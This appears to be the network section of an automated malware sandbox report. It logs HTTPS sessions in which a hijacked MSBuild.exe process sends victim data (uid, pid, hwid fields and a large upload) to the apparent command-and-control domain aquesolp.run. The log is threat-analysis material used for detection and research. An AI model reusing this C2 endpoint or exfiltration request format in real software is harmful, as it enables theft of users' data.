                                          2025-04-11 23:45:04 UTC1369INData Raw: 40 75 de 36 08 a5 40 9a 71 f4 c4 58 32 2a fb 00 14 db 61 48 87 07 6b db 12 74 86 d3 8d ba be 24 25 35 cc c6 43 5e 94 e6 59 a0 28 d5 bb 6f 8c 07 ac c3 3f 14 05 84 f8 19 18 bb 66 0a 4b 61 8d 83 be b9 99 78 fa 51 d9 a2 7c ba 1c 21 f2 09 74 f9 5a 4a 09 24 02 91 5d 8b 27 88 b2 7b 04 35 69 cb d8 e5 52 da a1 6c 0f 66 bd 6b bd de a9 27 d2 2c 3c 8e af fd ad 3d 36 64 10 0c 15 50 18 6b db ef 8c de 4c 19 2d 8a 81 38 4a 9d 90 0c 51 0e 3e bc 02 08 5b be d7 3c b0 dc 80 2a f0 29 45 38 cd 07 b3 f1 45 6f 8b cf f3 3b eb 0d 3c 3b 84 26 81 b9 26 f9 c7 b6 f9 1d c4 cb 1e a1 69 93 e6 05 eb 9f eb 6c cd 08 91 ea c9 5b 20 65 f7 29 1c c5 cb 24 6a 9b 72 e7 13 e8 4d 26 4a 62 1c 96 16 3c 89 f4 3c ce ad 8a fd 8f 65 4d 91 30 f1 69 0f c7 59 20 82 8f 9c 50 d9 2d a3 0a b4 b5 de b6 6e a9 2a
                                          Data Ascii: @u6@qX2*aHkt$%5C^Y(o?fKaxQ|!tZJ$]'{5iRlfk',<=6dPkL-8JQ>[<*)E8Eo;<;&&il[ e)$jrM&Jb<<eM0iY P-n*
                                          2025-04-11 23:45:04 UTC1369INData Raw: 3e 9f 8a 1a 50 01 99 9f 17 bb cc 63 69 d6 77 a7 58 c1 c1 18 67 ca 03 44 dd 31 26 c6 80 b3 5c 22 32 e1 1b da f7 47 55 ac 06 16 6e 68 94 d3 ac 08 cb d5 6b e0 72 ea 5e 99 af 0d 15 90 1b 37 fe 18 c3 25 28 07 fa a1 8e 53 46 8a a2 b3 3e f5 7c cb 9c 5f 8e 33 6c ba e1 49 54 c4 1f ce ee bd 92 b7 ae 57 40 bb 05 b5 96 36 e8 03 e9 e1 55 17 70 c1 2c 70 91 dd 5c b2 8d 4f f1 16 d0 cc 2e d4 1f 85 80 a1 c4 1b 5a 62 e1 6f e3 c8 de 52 b1 2a ef 78 0b a8 05 46 0a 52 8a c4 dd c0 94 b7 81 a4 db 6f bf b2 3f 1d 6e 06 04 1e 31 e0 63 58 23 31 53 c6 63 68 9e f4 55 77 d6 30 38 b0 41 6a 10 1a 93 bf 75 45 cd 2a ef da 85 b7 46 0a bb 4c ee ab 4e bd fe 6f 42 b7 3b 68 10 90 2d db 1a e2 e1 ac a8 a4 fa 30 49 52 50 83 8b 36 58 bc 65 ca 8d 6d 00 d4 f7 1a 96 a5 8b da 9a 9f 4a de 29 26 7f bc 5c
                                          Data Ascii: >PciwXgD1&\"2GUnhkr^7%(SF>|_3lITW@6Up,p\O.ZboR*xFRo?n1cX#1SchUw08AjuE*FLNoB;h-0IRP6XemJ)&\
                                          2025-04-11 23:45:04 UTC1369INData Raw: 78 d4 fc 58 4f cb 86 86 a2 91 c9 5c ce f9 37 40 df d3 0c 56 aa d8 ef b0 b8 86 c7 67 1b e1 23 32 b5 87 bd bb ef b2 a7 a3 dd 7f f8 1e 72 10 fd a8 62 47 ea 3e 0c 90 74 af f5 32 1a eb 7d 97 51 99 6c b2 c7 40 6f bd 17 70 d5 72 d8 ab 55 1a 45 70 89 f9 97 72 e6 1e e7 73 0c 6b 7e 1f 03 cf 0f 0d 16 60 b4 88 fc 37 fb 1e 1d f8 eb 6d 93 04 2e 1f b2 c9 fc d0 05 d6 a7 1e 96 de 6c 30 d4 79 8d 89 e8 b3 45 d8 b1 72 c7 8b 49 21 58 e9 10 25 a7 f6 07 7e 15 1d 1e 6f 38 a5 b3 43 70 e4 97 78 88 a6 c0 48 48 9f bb a7 16 8b 56 b2 c0 d3 70 f1 34 10 e0 20 aa da b9 f8 80 84 97 70 da 26 7d 6d e5 a6 fb 88 c6 ac ec 76 84 d5 46 4a 39 09 3b 87 00 83 70 13 b2 e6 6b 42 74 51 bf 03 82 e3 8a f8 ec 56 d6 26 e0 b4 93 86 e7 67 7f d5 00 eb e8 69 77 b9 b4 75 f0 e3 e1 1c dd 49 09 1e d4 0d 2d 28 63
                                          Data Ascii: xXO\7@Vg#2rbG>t2}Ql@oprUEprsk~`7m.l0yErI!X%~o8CpxHHVp4 p&}mvFJ9;pkBtQV&giwuI-(c
                                          2025-04-11 23:45:04 UTC1369INData Raw: df 20 14 ca 9a 80 a2 f4 3b 9d d0 53 a7 45 a8 5c 83 2b 3f 1d ce 05 f5 15 ad c9 94 e8 d8 d3 17 31 c0 f4 7a 5a 01 e3 c9 bd 0a 53 9e ac f1 f1 cb 6a df ea 4b 88 cc b8 0f e1 b1 ac 92 04 55 66 18 ca 34 4f 52 18 8d a2 f1 a1 52 45 08 a9 58 e4 34 67 82 ae c5 0c 6b d1 ef e7 3d 3f 9b 51 d8 63 6f a3 ca 40 d0 66 92 81 2e 59 6b 99 71 77 4c e6 27 39 a7 4e dd 26 37 c1 80 fd c3 13 7d 97 0c e1 1b 51 56 cc fd 5c d7 2b 9f f1 73 b4 96 dc 02 d2 de b1 25 54 c8 bb b8 da 53 5f 0d 8d 14 12 16 db c3 90 c4 55 95 e8 55 a5 84 5a fb ee 3d eb f6 ce 68 52 c0 59 55 2e be bf 95 cf 45 19 e2 15 a6 9c cd 3e ac 35 68 95 46 f7 95 60 4a 4b 56 12 40 f9 cb 61 b6 ea 81 27 d3 00 a0 0f dd 3b 85 39 4b 05 9b b4 2d 0b 4b 15 82 87 e9 2b c7 7d 6f a6 52 18 2d e3 ae 99 eb 60 83 ed 70 95 02 6d c8 68 5e ac 73
                                          Data Ascii: ;SE\+?1zZSjKUf4ORREX4gk=?Qco@f.YkqwL'9N&7}QV\+s%TS_UUZ=hRYU.E>5hF`JKV@a';9K-K+}oR-`pmh^s
                                          2025-04-11 23:45:04 UTC1369INData Raw: 70 7d da b4 18 25 a1 11 29 21 b2 4b 6c 88 94 d6 d6 25 b5 f4 dd d8 b8 85 6e e6 06 46 2c a4 7f 05 7e de bb e7 9f be 97 e1 ba e2 d4 87 54 99 a3 20 f9 af c4 14 68 4d d7 a2 67 46 07 e1 66 29 88 5a 77 ef 4a 04 52 07 26 e6 de 3c 87 25 79 a5 86 bb 53 0b 1b 98 59 9b 1e cf c6 c7 12 c0 cb 64 46 29 4a 2b d2 ef 56 55 7e c4 45 d3 4a fb b2 ec 96 b0 8b e7 0d 00 02 dc ff f9 9a ce 2e 85 1f 1e 4c 0f ff 11 fb 96 a4 1a d3 6b 67 4f ac 6e 72 07 49 dd da 9b 37 d8 fa ab df 7a 95 9b 59 9e 29 fb de 1a 90 49 f7 d9 14 8b fb 26 69 65 fd bc 7c 65 2a 80 7c 7c e9 3b 3e 44 7a 19 6a a4 d8 af f3 31 b5 d3 fa 81 9a b4 7f e1 4a 03 3b 14 83 23 0f 8d ad 9a a6 ae 96 c9 06 a2 d6 11 a7 21 d4 df 12 f4 87 d7 12 64 4b 95 d4 70 51 ea a3 b8 b0 2f e5 86 69 38 c3 8f cb 1d 4e a9 85 ba a9 5a ee d0 83 4f d8
                                          Data Ascii: p}%)!Kl%nF,~T hMgFf)ZwJR&<%ySYdF)J+VU~EJ.LkgOnrI7zY)I&ie|e*||;>Dzj1J;#!dKpQ/i8NZO
                                          2025-04-11 23:45:04 UTC1369INData Raw: a6 3b 75 7d 20 c0 ef e0 3a 9f 1b be a3 44 7b bd 09 a1 e4 00 b2 c4 f9 68 9a be 0c 02 d8 f8 e9 f0 1a a6 96 c7 ad 00 74 05 9d 0e ee d7 db f9 26 3d c3 a9 16 74 ec f9 a9 a1 be 04 84 c5 cd 4a 16 cd c7 5c 10 68 ab 1c f2 79 b2 fb 93 f6 2e f0 0c d7 5e 7d cf fe 0f ce ac c4 8d fb 10 ce 78 89 bc 92 4b a2 08 f4 c8 46 a3 6f 17 b6 ba 78 81 3f dd 79 02 39 7b 71 ff b4 94 bb 69 7b 1f 76 f5 4d 55 6e 70 d9 63 ce bb 02 73 aa 7a 48 b7 a8 90 73 99 12 9f 7c f0 ea 78 b2 14 8c 7e 95 f1 62 ee e2 5f 9c 78 28 b1 65 b2 12 1f 05 e4 3a be 06 3b 56 e2 3f 4d 99 81 10 12 b2 22 99 a3 09 34 a7 c0 3e be c3 8e 4f 3f c8 6d a1 64 7e aa f3 0f 3d e4 eb 5c d0 bc 0a ad 6e 2d 40 0a 92 bf a9 9a 16 51 1f 29 f4 26 05 2d 9a 2f 49 eb 7b a1 f0 5b 78 39 f2 16 6d d8 d1 4b da 4c 84 97 2e f6 72 f7 20 d6 92 d4
                                          Data Ascii: ;u} :D{ht&=tJ\hy.^}xKFox?y9{qi{vMUnpcszHs|x~b_x(e:;V?M"4>O?md~=\n-@Q)&-/I{[x9mKL.r
                                          2025-04-11 23:45:04 UTC753INData Raw: 8a dc 07 84 c3 1f a0 59 2a 52 3f e0 4c 39 74 0c 6c e7 9a a1 f8 0c c8 54 c6 86 60 c0 65 67 88 73 55 56 74 71 18 8c 59 ce d8 51 fb 54 f7 24 7e 6e d4 db 34 6f c2 54 93 46 67 c2 86 65 d3 34 7f 6e 03 1f bd b8 a7 75 c6 45 34 ee 2f 12 b3 af 71 75 45 93 1f 36 9d de 10 c6 d2 2e 95 62 a6 41 3a 46 a0 47 d9 2f 42 bd 24 0d da 19 f7 35 f2 ec 6c 19 4d 9b 11 cc dc da 1e 52 c7 0f f0 1b 46 61 46 90 66 e6 17 7d 24 fd 7b 6f 7a a9 62 a4 31 b7 6c 37 b5 69 07 d9 0f be ee 81 be b4 66 07 c4 5c 49 95 83 8e 63 5d 1e b6 91 7b 12 c0 bb aa a2 f6 9b d3 fd c2 51 d2 1e d6 90 18 ae 63 08 07 be 06 2f 26 12 a3 f6 ec 17 72 42 73 04 d2 c1 ca 48 0f 8d ca 05 c6 ae 42 7c b7 0d 14 f6 c7 06 b3 92 63 fe 22 6a 9a f4 c6 8b d1 d6 39 a6 12 3a 84 3b 99 28 84 af ba a1 a3 7c 18 3d 97 a4 b0 58 82 af a0 f0
                                          Data Ascii: Y*R?L9tlT`egsUVtqYQT$~n4oTFge4nuE4/quE6.bA:FG/B$5lMRFaFf}${ozb1l7if\Ic]{Qc/&rBsHB|c"j9:;(|=X


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.549694104.21.22.104437396C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2025-04-11 23:45:06 UTC279OUTPOST /agosoz HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=jbYhCx732MpGf288
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                          Content-Length: 14927
                                          Host: aquesolp.run
                                          2025-04-11 23:45:06 UTC14927OUTData Raw: 2d 2d 6a 62 59 68 43 78 37 33 32 4d 70 47 66 32 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 65 31 34 34 35 65 31 32 61 66 35 64 35 63 32 61 62 62 64 33 65 33 63 64 37 64 39 35 36 37 34 64 63 36 30 33 31 34 66 33 35 63 63 32 30 62 64 39 62 34 39 39 36 32 37 0d 0a 2d 2d 6a 62 59 68 43 78 37 33 32 4d 70 47 66 32 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 6a 62 59 68 43 78 37 33 32 4d 70 47 66 32 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64
                                          Data Ascii: --jbYhCx732MpGf288Content-Disposition: form-data; name="uid"de1445e12af5d5c2abbd3e3cd7d95674dc60314f35cc20bd9b499627--jbYhCx732MpGf288Content-Disposition: form-data; name="pid"2--jbYhCx732MpGf288Content-Disposition: form-data; name="hwid
                                          2025-04-11 23:45:07 UTC804INHTTP/1.1 200 OK
                                          Date: Fri, 11 Apr 2025 23:45:07 GMT
                                          Content-Type: application/json
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zpcbDUdUMguQiE0rT7NP5xHxOxMnLU%2BSplBr8yPGc0V6oZSEW2OX2oqUcX5kMfWJZAElRRv3zXmoAy9Dm0YsBSfu8jDdJQYmM4rxJJUG7l37xBvbZ5H3JuXROhyn8%2BQ%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 92ee5b10cb5a5b58-IAD
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=121689&min_rtt=121527&rtt_var=25730&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2824&recv_bytes=15864&delivery_rate=33194&cwnd=246&unsent_bytes=0&cid=e5de9ad4b855ff84&ts=611&x=0"
                                          2025-04-11 23:45:07 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                          Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                          2025-04-11 23:45:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549695104.21.22.104437396C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2025-04-11 23:45:07 UTC273OUTPOST /agosoz HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=Q1Q1WC1rnb
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                          Content-Length: 15046
                                          Host: aquesolp.run
                                          2025-04-11 23:45:07 UTC15046OUTData Raw: 2d 2d 51 31 51 31 57 43 31 72 6e 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 65 31 34 34 35 65 31 32 61 66 35 64 35 63 32 61 62 62 64 33 65 33 63 64 37 64 39 35 36 37 34 64 63 36 30 33 31 34 66 33 35 63 63 32 30 62 64 39 62 34 39 39 36 32 37 0d 0a 2d 2d 51 31 51 31 57 43 31 72 6e 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 31 51 31 57 43 31 72 6e 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 42 45 43 46 38 34 35 35 44 44 36 36
                                          Data Ascii: --Q1Q1WC1rnbContent-Disposition: form-data; name="uid"de1445e12af5d5c2abbd3e3cd7d95674dc60314f35cc20bd9b499627--Q1Q1WC1rnbContent-Disposition: form-data; name="pid"2--Q1Q1WC1rnbContent-Disposition: form-data; name="hwid"CBECF8455DD66
                                          2025-04-11 23:45:08 UTC809INHTTP/1.1 200 OK
                                          Date: Fri, 11 Apr 2025 23:45:08 GMT
                                          Content-Type: application/json
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0%2BJMY%2B%2BkACMftcLmtpdXlgROToQrJNuJshU8MPhrIsFFwzinKz4o7UsakBG5p%2BTiSD%2FoB2xJIlykDNSTppIjivmTm2LDWbTIVk8lwdqtf6BccbKTMhOHntg2LBY4kc%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 92ee5b172bf2bccc-ATL
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=107034&min_rtt=106295&rtt_var=23536&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2825&recv_bytes=15977&delivery_rate=37199&cwnd=251&unsent_bytes=0&cid=5f62e16f58f61183&ts=613&x=0"
                                          2025-04-11 23:45:08 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                          Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                          2025-04-11 23:45:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.549696104.21.22.104437396C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2025-04-11 23:45:08 UTC281OUTPOST /agosoz HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=O58vUC99jMSG39CvlW
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                          Content-Length: 20575
                                          Host: aquesolp.run
                                          2025-04-11 23:45:08 UTC15331OUTData Raw: 2d 2d 4f 35 38 76 55 43 39 39 6a 4d 53 47 33 39 43 76 6c 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 65 31 34 34 35 65 31 32 61 66 35 64 35 63 32 61 62 62 64 33 65 33 63 64 37 64 39 35 36 37 34 64 63 36 30 33 31 34 66 33 35 63 63 32 30 62 64 39 62 34 39 39 36 32 37 0d 0a 2d 2d 4f 35 38 76 55 43 39 39 6a 4d 53 47 33 39 43 76 6c 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 35 38 76 55 43 39 39 6a 4d 53 47 33 39 43 76 6c 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65
                                          Data Ascii: --O58vUC99jMSG39CvlWContent-Disposition: form-data; name="uid"de1445e12af5d5c2abbd3e3cd7d95674dc60314f35cc20bd9b499627--O58vUC99jMSG39CvlWContent-Disposition: form-data; name="pid"3--O58vUC99jMSG39CvlWContent-Disposition: form-data; name
                                          2025-04-11 23:45:08 UTC5244OUTData Raw: 22 de 65 d1 32 ac a9 54 1f 0e 74 35 bf 8f e0 64 99 1d 43 db 3e ce f4 ec b0 2a 40 a6 f0 1a 25 6e 15 cd e6 14 17 c7 f3 f4 43 91 ee fa 58 c4 28 25 7e d4 1c d6 ca d8 f1 e3 fe be 91 32 e6 0a 8c 16 1a 28 d4 b9 46 ca 37 c7 5b bd 7d 9f 34 65 f2 ce 46 15 12 78 80 10 07 55 2e 7a fb db 8a a2 b5 4b c1 14 57 4c bf 5e e6 b8 b6 c3 8b 63 1e 49 dc 56 e5 8c 46 17 e3 1f 44 a5 f4 ef cb 96 ff 35 c6 e2 b8 f9 39 02 e4 a9 63 5f 77 52 cd 82 39 df 8c eb 0f 6d 0e db d1 5e fe ac 81 37 3d 45 e8 3a 39 eb 65 84 a5 8c ec 8f 36 7a c0 d5 4f 33 43 f2 ab 58 55 9b 92 f8 ff 67 5b 05 a1 75 69 be 8f 38 13 2e 90 5c 9a c6 84 42 8e 8d f0 d0 6b e4 91 b6 d1 45 64 49 5d d9 f4 d8 dc a6 d1 ff f5 e0 0e ec 73 93 b9 28 0c ba 37 59 9d 41 8c ec 40 cb a7 b2 31 1d c0 87 c0 bf 34 eb f4 28 4a 35 53 e3 f1 64 a2
                                          Data Ascii: "e2Tt5dC>*@%nCX(%~2(F7[}4eFxU.zKWL^cIVFD59c_wR9m^7=E:9e6zO3CXUg[ui8.\BkEdI]s(7YA@14(J5Sd
                                          2025-04-11 23:45:09 UTC814INHTTP/1.1 200 OK
                                          Date: Fri, 11 Apr 2025 23:45:09 GMT
                                          Content-Type: application/json
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ssxIy%2FiImbfZveTtp6LZQ33dbE4YyTDuRZ5GlPp2BNEefGb5Jz%2B3B3%2FhflF4K2KHMOMpIctkJ2eO%2BqPps8AhX8Y%2FY0w55gRWBvrI8KDArjzf5J4lfGdtaF8hM%2B%2BbUaM%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 92ee5b1d4f32c015-ATL
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=106071&min_rtt=106059&rtt_var=22392&sent=15&recv=23&lost=0&retrans=0&sent_bytes=2826&recv_bytes=21536&delivery_rate=38053&cwnd=252&unsent_bytes=0&cid=348a30556a2aac4b&ts=626&x=0"
                                          2025-04-11 23:45:09 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                          Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                          2025-04-11 23:45:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.549697104.21.22.104437396C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2025-04-11 23:45:10 UTC281OUTPOST /agosoz HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=8rnKhWG0IxQ19AIK3p7
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                          Content-Length: 2599
                                          Host: aquesolp.run
                                          2025-04-11 23:45:10 UTC2599OUTData Raw: 2d 2d 38 72 6e 4b 68 57 47 30 49 78 51 31 39 41 49 4b 33 70 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 65 31 34 34 35 65 31 32 61 66 35 64 35 63 32 61 62 62 64 33 65 33 63 64 37 64 39 35 36 37 34 64 63 36 30 33 31 34 66 33 35 63 63 32 30 62 64 39 62 34 39 39 36 32 37 0d 0a 2d 2d 38 72 6e 4b 68 57 47 30 49 78 51 31 39 41 49 4b 33 70 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 72 6e 4b 68 57 47 30 49 78 51 31 39 41 49 4b 33 70 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e
                                          Data Ascii: --8rnKhWG0IxQ19AIK3p7Content-Disposition: form-data; name="uid"de1445e12af5d5c2abbd3e3cd7d95674dc60314f35cc20bd9b499627--8rnKhWG0IxQ19AIK3p7Content-Disposition: form-data; name="pid"1--8rnKhWG0IxQ19AIK3p7Content-Disposition: form-data; n
                                          2025-04-11 23:45:11 UTC806INHTTP/1.1 200 OK
                                          Date: Fri, 11 Apr 2025 23:45:11 GMT
                                          Content-Type: application/json
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rgbKKJGsWXPDBAdH9ZuvBCZbtA6YdCIoeD%2FDUvQAK9%2B8KKgd%2B1HXYdd5iABMMrzuo8eOyrbZhymJMdDffng4yl%2BsGd51wgw73v3ADv9pyGp4H59zgDI1266XIxCn1Rs%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 92ee5b297e46bfe5-ATL
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=106273&min_rtt=106146&rtt_var=22582&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2824&recv_bytes=3516&delivery_rate=37902&cwnd=251&unsent_bytes=0&cid=948120b46d4a207e&ts=554&x=0"
                                          2025-04-11 23:45:11 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                          Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                          2025-04-11 23:45:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.549698104.21.22.104437396C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2025-04-11 23:45:11 UTC273OUTPOST /agosoz HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=SSYrK0MK8
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                          Content-Length: 570405
                                          Host: aquesolp.run
                                          2025-04-11 23:45:11 UTC15331OUTData Raw: 2d 2d 53 53 59 72 4b 30 4d 4b 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 65 31 34 34 35 65 31 32 61 66 35 64 35 63 32 61 62 62 64 33 65 33 63 64 37 64 39 35 36 37 34 64 63 36 30 33 31 34 66 33 35 63 63 32 30 62 64 39 62 34 39 39 36 32 37 0d 0a 2d 2d 53 53 59 72 4b 30 4d 4b 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 53 59 72 4b 30 4d 4b 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 42 45 43 46 38 34 35 35 44 44 36 36 36 37 30
                                          Data Ascii: --SSYrK0MK8Content-Disposition: form-data; name="uid"de1445e12af5d5c2abbd3e3cd7d95674dc60314f35cc20bd9b499627--SSYrK0MK8Content-Disposition: form-data; name="pid"1--SSYrK0MK8Content-Disposition: form-data; name="hwid"CBECF8455DD66670
